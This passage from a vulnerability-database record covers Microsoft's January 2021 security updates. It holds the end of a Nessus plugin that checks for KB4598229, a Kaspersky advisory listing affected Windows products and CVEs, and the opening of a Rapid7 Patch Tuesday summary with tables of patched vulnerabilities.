\"CVE-2021-1660\",\n \"CVE-2021-1661\",\n \"CVE-2021-1662\",\n \"CVE-2021-1664\",\n \"CVE-2021-1665\",\n \"CVE-2021-1666\",\n \"CVE-2021-1667\",\n \"CVE-2021-1668\",\n \"CVE-2021-1669\",\n \"CVE-2021-1671\",\n \"CVE-2021-1672\",\n \"CVE-2021-1673\",\n \"CVE-2021-1674\",\n \"CVE-2021-1676\",\n \"CVE-2021-1678\",\n \"CVE-2021-1679\",\n \"CVE-2021-1680\",\n \"CVE-2021-1681\",\n \"CVE-2021-1682\",\n \"CVE-2021-1683\",\n \"CVE-2021-1684\",\n \"CVE-2021-1685\",\n \"CVE-2021-1686\",\n \"CVE-2021-1687\",\n \"CVE-2021-1688\",\n \"CVE-2021-1689\",\n \"CVE-2021-1690\",\n \"CVE-2021-1691\",\n \"CVE-2021-1693\",\n \"CVE-2021-1694\",\n \"CVE-2021-1695\",\n \"CVE-2021-1696\",\n \"CVE-2021-1697\",\n \"CVE-2021-1699\",\n \"CVE-2021-1700\",\n \"CVE-2021-1701\",\n \"CVE-2021-1702\",\n \"CVE-2021-1704\",\n \"CVE-2021-1705\",\n \"CVE-2021-1706\",\n \"CVE-2021-1708\",\n \"CVE-2021-1709\",\n \"CVE-2021-1710\"\n );\n script_xref(name:\"MSKB\", value:\"4598229\");\n script_xref(name:\"MSFT\", value:\"MS21-4598229\");\n script_xref(name:\"IAVA\", value:\"2021-A-0023-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0015-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0022-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0001\");\n\n script_name(english:\"KB4598229: Windows 10 Version 1909 January 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1685. (CVE-2021-1642)\n\n - Windows DNS Query Information Disclosure Vulnerability (CVE-2021-1637)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1680. (CVE-2021-1651)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1652)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1653)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1654)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1655)\n\n - TPM Device Driver Information Disclosure Vulnerability (CVE-2021-1656)\n\n - Windows Fax Compose Form Remote Code Execution Vulnerability (CVE-2021-1657)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1658)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1659)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1660)\n\n - Windows Installer Elevation of Privilege Vulnerability (CVE-2021-1661)\n\n - Windows Event Tracing Elevation of Privilege Vulnerability (CVE-2021-1662)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1664)\n\n - GDI+ Remote Code Execution Vulnerability (CVE-2021-1665)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1666)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1667)\n\n - Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability (CVE-2021-1668)\n\n - Windows Remote Desktop Security Feature Bypass Vulnerability (CVE-2021-1669)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1671)\n\n - Windows Projected File System FS Filter Driver Information Disclosure Vulnerability This CVE ID is unique\n from CVE-2021-1663, CVE-2021-1670. (CVE-2021-1672)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1673)\n\n - Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability (CVE-2021-1674)\n\n - Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability (CVE-2021-1676)\n\n - Windows CryptoAPI Denial of Service Vulnerability (CVE-2021-1679)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1651. (CVE-2021-1680)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1686,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1681)\n\n - Windows Kernel Elevation of Privilege Vulnerability (CVE-2021-1682)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1684. (CVE-2021-1683)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1683. (CVE-2021-1684)\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1642. (CVE-2021-1685)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1686)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1690. (CVE-2021-1687)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1693. (CVE-2021-1688)\n\n - Windows Multipoint Management Elevation of Privilege Vulnerability (CVE-2021-1689)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1687. (CVE-2021-1690)\n\n - Hyper-V Denial of Service Vulnerability This CVE ID is unique from CVE-2021-1692. (CVE-2021-1691)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688. (CVE-2021-1693)\n\n - Windows Update Stack Elevation of Privilege Vulnerability (CVE-2021-1694)\n\n - Windows Print Spooler Elevation of Privilege Vulnerability (CVE-2021-1695)\n\n - Windows Graphics Component Information Disclosure Vulnerability (CVE-2021-1696)\n\n - Windows InstallService Elevation of Privilege Vulnerability (CVE-2021-1697)\n\n - Windows GDI+ Information Disclosure Vulnerability (CVE-2021-1708)\n\n - Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1709)\n\n - Microsoft Windows Media Foundation Remote Code Execution Vulnerability (CVE-2021-1710)\n\n - Windows Runtime C++ Template Library Elevation of Privilege Vulnerability (CVE-2021-1650)\n\n - Active Template Library Elevation of Privilege Vulnerability (CVE-2021-1649)\n\n - Microsoft splwow64 Elevation of Privilege Vulnerability (CVE-2021-1648)\n\n - Windows WLAN Service Elevation of Privilege Vulnerability (CVE-2021-1646)\n\n - Windows Docker Information Disclosure Vulnerability (CVE-2021-1645)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1683,\n CVE-2021-1684. (CVE-2021-1638)\n\n - NTLM Security Feature Bypass Vulnerability (CVE-2021-1678)\n\n - Windows (modem.sys) Information Disclosure Vulnerability (CVE-2021-1699)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1701. (CVE-2021-1700)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700. (CVE-2021-1701)\n\n - Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability (CVE-2021-1702)\n\n - Windows Hyper-V Elevation of Privilege Vulnerability (CVE-2021-1704)\n\n - Microsoft Edge (HTML-based) Memory Corruption Vulnerability (CVE-2021-1705)\n\n - Windows LUAFV Elevation of Privilege Vulnerability (CVE-2021-1706)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://support.microsoft.com/en-us/help/4598229/windows-10-update-kb4598229\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9ddc88c7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4598229.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1668\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-1694\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-01';\nkbs = make_list(\n '4598229'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'18363',\n rollup_date:'01_2021',\n bulletin:bulletin,\n rollup_kb_list:[4598229])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2021-12-22T23:24:21", "description": "### *Detect date*:\n01/12/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to gain privileges, execute arbitrary code, obtain sensitive information, bypass security restrictions, cause denial of service.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nMicrosoft Visual Studio 2019 version 16.0 \nWindows 10 Version 1909 for ARM64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2012 \nWindows 10 Version 1809 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 20H2 for ARM64-based Systems \nHEVC Video Extensions \nWindows Server, version 2004 (Server Core installation) \nWindows 10 Version 1607 for 32-bit Systems \nMicrosoft Visual Studio 2019 version 16.7 (includes 16.0 \u2013 16.6) \nMicrosoft Visual Studio 2019 version 16.8 \nWindows 10 Version 1803 for 32-bit Systems \nMicrosoft Remote Desktop for Android \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nMicrosoft Visual Studio 2015 Update 3 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server, version 20H2 (Server Core Installation) \nWindows 10 Version 1803 for x64-based Systems \nWindows 10 Version 2004 for 32-bit Systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2019 \nWindows RT 8.1 \nWindows 10 Version 2004 for x64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nMicrosoft Visual Studio 2017 version 15.9 (includes 15.0 - 15.8) \nWindows Server, version 1909 (Server Core installation) \nWindows Server 2016 \nWindows 10 Version 1809 for 32-bit Systems \nWindows 8.1 for x64-based systems \nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 1803 for ARM64-based Systems \nWindows Server 2016 (Server Core installation) \nWindows Server 2012 R2 \nWindows 10 Version 1607 for x64-based Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 20H2 for 32-bit Systems \nWindows 10 for 32-bit Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nMicrosoft Visual Studio 2019 version 16.4 (includes 16.0 - 16.3) \nWindows 10 for x64-based Systems \nWindows Server 2019 (Server Core installation) \nMicrosoft Remote Desktop \nRemote Desktop client for Windows Desktop \nWindows 8.1 for 32-bit systems \nWindows 10 Version 1909 for x64-based Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-1642](<https://nvd.nist.gov/vuln/detail/CVE-2021-1642>) \n[CVE-2021-1658](<https://nvd.nist.gov/vuln/detail/CVE-2021-1658>) \n[CVE-2021-1708](<https://nvd.nist.gov/vuln/detail/CVE-2021-1708>) \n[CVE-2021-1704](<https://nvd.nist.gov/vuln/detail/CVE-2021-1704>) \n[CVE-2021-1653](<https://nvd.nist.gov/vuln/detail/CVE-2021-1653>) \n[CVE-2021-1638](<https://nvd.nist.gov/vuln/detail/CVE-2021-1638>) \n[CVE-2021-1703](<https://nvd.nist.gov/vuln/detail/CVE-2021-1703>) \n[CVE-2021-1651](<https://nvd.nist.gov/vuln/detail/CVE-2021-1651>) \n[CVE-2021-1666](<https://nvd.nist.gov/vuln/detail/CVE-2021-1666>) \n[CVE-2021-1645](<https://nvd.nist.gov/vuln/detail/CVE-2021-1645>) \n[CVE-2021-1694](<https://nvd.nist.gov/vuln/detail/CVE-2021-1694>) \n[CVE-2021-1686](<https://nvd.nist.gov/vuln/detail/CVE-2021-1686>) \n[CVE-2021-1684](<https://nvd.nist.gov/vuln/detail/CVE-2021-1684>) \n[CVE-2021-1692](<https://nvd.nist.gov/vuln/detail/CVE-2021-1692>) \n[CVE-2021-1691](<https://nvd.nist.gov/vuln/detail/CVE-2021-1691>) \n[CVE-2021-1702](<https://nvd.nist.gov/vuln/detail/CVE-2021-1702>) \n[CVE-2021-1667](<https://nvd.nist.gov/vuln/detail/CVE-2021-1667>) \n[CVE-2021-1685](<https://nvd.nist.gov/vuln/detail/CVE-2021-1685>) \n[CVE-2021-1660](<https://nvd.nist.gov/vuln/detail/CVE-2021-1660>) \n[CVE-2021-1683](<https://nvd.nist.gov/vuln/detail/CVE-2021-1683>) \n[CVE-2021-1690](<https://nvd.nist.gov/vuln/detail/CVE-2021-1690>) \n[CVE-2021-1678](<https://nvd.nist.gov/vuln/detail/CVE-2021-1678>) \n[CVE-2021-1637](<https://nvd.nist.gov/vuln/detail/CVE-2021-1637>) \n[CVE-2021-1672](<https://nvd.nist.gov/vuln/detail/CVE-2021-1672>) \n[CVE-2021-1652](<https://nvd.nist.gov/vuln/detail/CVE-2021-1652>) \n[CVE-2021-1663](<https://nvd.nist.gov/vuln/detail/CVE-2021-1663>) \n[CVE-2021-1650](<https://nvd.nist.gov/vuln/detail/CVE-2021-1650>) \n[CVE-2021-1644](<https://nvd.nist.gov/vuln/detail/CVE-2021-1644>) \n[CVE-2021-1661](<https://nvd.nist.gov/vuln/detail/CVE-2021-1661>) \n[CVE-2021-1643](<https://nvd.nist.gov/vuln/detail/CVE-2021-1643>) \n[CVE-2021-1709](<https://nvd.nist.gov/vuln/detail/CVE-2021-1709>) \n[CVE-2021-1689](<https://nvd.nist.gov/vuln/detail/CVE-2021-1689>) \n[CVE-2021-1700](<https://nvd.nist.gov/vuln/detail/CVE-2021-1700>) \n[CVE-2021-1699](<https://nvd.nist.gov/vuln/detail/CVE-2021-1699>) \n[CVE-2021-1681](<https://nvd.nist.gov/vuln/detail/CVE-2021-1681>) \n[CVE-2021-1655](<https://nvd.nist.gov/vuln/detail/CVE-2021-1655>) \n[CVE-2021-1697](<https://nvd.nist.gov/vuln/detail/CVE-2021-1697>) \n[CVE-2021-1648](<https://nvd.nist.gov/vuln/detail/CVE-2021-1648>) \n[CVE-2021-1659](<https://nvd.nist.gov/vuln/detail/CVE-2021-1659>) \n[CVE-2021-1670](<https://nvd.nist.gov/vuln/detail/CVE-2021-1670>) \n[CVE-2021-1673](<https://nvd.nist.gov/vuln/detail/CVE-2021-1673>) \n[CVE-2021-1682](<https://nvd.nist.gov/vuln/detail/CVE-2021-1682>) \n[CVE-2021-1671](<https://nvd.nist.gov/vuln/detail/CVE-2021-1671>) \n[CVE-2021-1662](<https://nvd.nist.gov/vuln/detail/CVE-2021-1662>) \n[CVE-2021-1696](<https://nvd.nist.gov/vuln/detail/CVE-2021-1696>) \n[CVE-2021-1668](<https://nvd.nist.gov/vuln/detail/CVE-2021-1668>) \n[CVE-2021-1701](<https://nvd.nist.gov/vuln/detail/CVE-2021-1701>) \n[CVE-2021-1669](<https://nvd.nist.gov/vuln/detail/CVE-2021-1669>) \n[CVE-2021-1657](<https://nvd.nist.gov/vuln/detail/CVE-2021-1657>) \n[CVE-2021-1706](<https://nvd.nist.gov/vuln/detail/CVE-2021-1706>) \n[CVE-2021-1646](<https://nvd.nist.gov/vuln/detail/CVE-2021-1646>) \n[CVE-2021-1656](<https://nvd.nist.gov/vuln/detail/CVE-2021-1656>) \n[CVE-2021-1693](<https://nvd.nist.gov/vuln/detail/CVE-2021-1693>) \n[CVE-2021-1654](<https://nvd.nist.gov/vuln/detail/CVE-2021-1654>) \n[CVE-2021-1649](<https://nvd.nist.gov/vuln/detail/CVE-2021-1649>) \n[CVE-2021-1664](<https://nvd.nist.gov/vuln/detail/CVE-2021-1664>) \n[CVE-2021-1695](<https://nvd.nist.gov/vuln/detail/CVE-2021-1695>) \n[CVE-2021-1674](<https://nvd.nist.gov/vuln/detail/CVE-2021-1674>) \n[CVE-2021-1680](<https://nvd.nist.gov/vuln/detail/CVE-2021-1680>) \n[CVE-2021-1679](<https://nvd.nist.gov/vuln/detail/CVE-2021-1679>) \n[CVE-2021-1687](<https://nvd.nist.gov/vuln/detail/CVE-2021-1687>) \n[CVE-2021-1710](<https://nvd.nist.gov/vuln/detail/CVE-2021-1710>) \n[CVE-2021-1676](<https://nvd.nist.gov/vuln/detail/CVE-2021-1676>) \n[CVE-2021-1665](<https://nvd.nist.gov/vuln/detail/CVE-2021-1665>) \n[CVE-2021-1688](<https://nvd.nist.gov/vuln/detail/CVE-2021-1688>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Visual Studio](<https://threats.kaspersky.com/en/product/Microsoft-Visual-Studio/>)\n\n### *KB list*:\n[4598275](<http://support.microsoft.com/kb/4598275>) \n[4598243](<http://support.microsoft.com/kb/4598243>) \n[4598285](<http://support.microsoft.com/kb/4598285>) \n[4598278](<http://support.microsoft.com/kb/4598278>) \n[4598297](<http://support.microsoft.com/kb/4598297>) \n[4598231](<http://support.microsoft.com/kb/4598231>) \n[4598229](<http://support.microsoft.com/kb/4598229>) \n[4598242](<http://support.microsoft.com/kb/4598242>) \n[4598230](<http://support.microsoft.com/kb/4598230>) \n[4598245](<http://support.microsoft.com/kb/4598245>) \n[4601354](<http://support.microsoft.com/kb/4601354>) \n[4601319](<http://support.microsoft.com/kb/4601319>) \n[4601315](<http://support.microsoft.com/kb/4601315>) \n[4601345](<http://support.microsoft.com/kb/4601345>) \n[5005613](<http://support.microsoft.com/kb/5005613>) \n[5005568](<http://support.microsoft.com/kb/5005568>) \n[5005627](<http://support.microsoft.com/kb/5005627>) \n[5005565](<http://support.microsoft.com/kb/5005565>) \n[5005623](<http://support.microsoft.com/kb/5005623>) \n[5005573](<http://support.microsoft.com/kb/5005573>) \n[5005569](<http://support.microsoft.com/kb/5005569>) \n[5005566](<http://support.microsoft.com/kb/5005566>) \n[5005607](<http://support.microsoft.com/kb/5005607>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-12T00:00:00", "type": "kaspersky", "title": "KLA12045 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1637", "CVE-2021-1638", "CVE-2021-1642", "CVE-2021-1643", "CVE-2021-1644", "CVE-2021-1645", "CVE-2021-1646", "CVE-2021-1648", "CVE-2021-1649", "CVE-2021-1650", "CVE-2021-1651", "CVE-2021-1652", "CVE-2021-1653", "CVE-2021-1654", "CVE-2021-1655", "CVE-2021-1656", "CVE-2021-1657", "CVE-2021-1658", "CVE-2021-1659", "CVE-2021-1660", "CVE-2021-1661", "CVE-2021-1662", "CVE-2021-1663", "CVE-2021-1664", "CVE-2021-1665", "CVE-2021-1666", "CVE-2021-1667", "CVE-2021-1668", "CVE-2021-1669", "CVE-2021-1670", "CVE-2021-1671", "CVE-2021-1672", "CVE-2021-1673", "CVE-2021-1674", "CVE-2021-1676", "CVE-2021-1678", "CVE-2021-1679", "CVE-2021-1680", "CVE-2021-1681", "CVE-2021-1682", "CVE-2021-1683", "CVE-2021-1684", "CVE-2021-1685", "CVE-2021-1686", "CVE-2021-1687", "CVE-2021-1688", "CVE-2021-1689", "CVE-2021-1690", "CVE-2021-1691", "CVE-2021-1692", "CVE-2021-1693", "CVE-2021-1694", "CVE-2021-1695", "CVE-2021-1696", "CVE-2021-1697", "CVE-2021-1699", "CVE-2021-1700", "CVE-2021-1701", "CVE-2021-1702", "CVE-2021-1703", "CVE-2021-1704", "CVE-2021-1706", "CVE-2021-1708", "CVE-2021-1709", "CVE-2021-1710"], "modified": "2021-09-16T00:00:00", "id": "KLA12045", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12045/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-01-15T00:48:37", "description": "![Patch Tuesday - January 2021](https://blog.rapid7.com/content/images/2021/01/patches-2.jpg)\n\nWe arrive at the first Patch Tuesday of 2021 ([2021-Jan](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Jan>)) with 83 vulnerabilities across our standard spread of products. Windows Operating System vulnerabilities dominated this month's advisories, followed by Microsoft Office (which includes the SharePoint family of products), and lastly some from less frequent products such as Microsoft System Center and Microsoft SQL Server.\n\n### Vulnerability Breakdown by Software Family\n\nFamily | Vulnerability Count \n---|--- \nWindows | 65 \nESU | 35 \nMicrosoft Office | 11 \nDeveloper Tools | 5 \nSQL Server | 1 \nApps | 1 \nSystem Center | 1 \nAzure | 1 \nBrowser | 1 \n \n### [Microsoft Defender Remote Code Execution Vulnerability](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>) (CVE-2021-1647)\n\nCVE-2021-1647 is marked as a CVSS 7.8, actively exploited, remote code execution vulnerability through the Microsoft Malware Protection Engine (mpengine.dll) between version 1.1.17600.5 up to 1.1.17700.4. \n\nAs a default, Microsoft's affected antimalware software will automatically keep the Microsoft Malware Protection Engine up to date. What this means, however, is that no further action is needed to resolve this vulnerability unless non-standard configurations are used. \n\nThis vulnerability affects Windows Defender or the supported Endpoint Protection pieces of the System Center family of products (2012, 2012 R2, and namesake version: Microsoft System Center Endpoint Protection).\n\n### Patching Windows Operating Systems Next\n\nAnother confirmation of the standard advice of prioritizing Operating System patches whenever possible is that 11 of the 13 top CVSS-scoring (CVSSv3 8.8) vulnerabilities addressed in this month's Patch Tuesday would be immediately covered through these means. As an interesting observation, the Windows Remote Procedure Call Runtime component appears to have been given extra scrutiny this month. This RPC Runtime component accounts for the 9 of the 13 top CVSS scoring vulnerabilities along with half of all the 10 Critical Remote Code Execution vulnerabilities being addressed.\n\n### More Work to be Done\n\nLastly, some minor calls to note that this Patch Tuesday includes SQL Server as that is an atypical family covered during Patch Tuesdays and, arguably more notable, is a reminder that [Adobe Flash has officially reached end-of-life](<https://docs.microsoft.com/en-us/lifecycle/announcements/adobe-flash-end-of-support>) and would've been actively removed from all browsers via Windows Update (already).\n\n## Summary Tables\n\nHere are this month's patched vulnerabilities split by the product family.\n\n## Azure Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1677](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1677>) | Azure Active Directory Pod Identity Spoofing Vulnerability | No | No | 5.5 | Yes \n \n## Browser Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1705](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1705>) | Microsoft Edge (HTML-based) Memory Corruption Vulnerability | No | No | 4.2 | No \n \n## Developer Tools Vulnerabilities\n\ncve | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2020-26870](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-26870>) | Visual Studio Remote Code Execution Vulnerability | No | No | 7 | Yes 